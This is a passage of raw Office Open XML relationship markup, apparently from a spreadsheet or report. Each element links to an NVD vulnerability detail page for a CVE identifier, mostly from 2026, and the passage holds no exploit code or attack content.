Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87995" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88263" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88817" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90776" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92355" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19535" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20135" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20154" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20249" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20250" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20295" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20352" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4129" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54628" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56100" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73163" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73164" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73165" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73166" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73167" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73170" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73171" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73176" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73177" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73454" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78375" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81213" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82765" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82768" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82793" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85979" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86762" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86770" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90608" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90932" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91098" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91105" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92576" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55072" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67378" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67379" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70341" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76412" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79708" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80436" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81207" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81540" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86359" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87023" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87030" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90553" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92397" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92398" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20334" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40857" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4130" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68955" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76825" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82049" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82717" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84546" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84580" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84581" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84584" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85616" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86836" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89781" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89782" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89795" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89806" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89856" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89877" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89885" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89904" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89943" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89980" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89992" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90895" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91102" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20323" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69646" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86771" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87034" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88033" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92467" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92752" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17467" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57132" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63127" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65838" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71180" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76413" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77406" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77409" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78252" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82786" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84535" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84577" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85921" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86107" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89973" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92729" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-43936" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16335" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20335" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27552" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54178" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61591" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61593" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63671" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65415" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69813" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69858" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69989" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70342" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70563" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74909" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78450" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81268" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81551" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82066" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82291" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84516" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87036" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87075" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89848" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89861" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89999" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92087" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92578" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92604" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92749" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92751" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92763" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92776" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92782" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92783" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92785" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92793" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92806" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69423" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69503" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85469" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89947" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89954" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92127" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92134" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92135" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92136" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89911" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17133" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17156" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17416" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23789" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43684" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43688" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43702" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59974" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63325" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64790" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65344" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69270" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69295" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69307" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69571" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69584" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69687" TargetMode="External" Id="rId444" /><Relationship 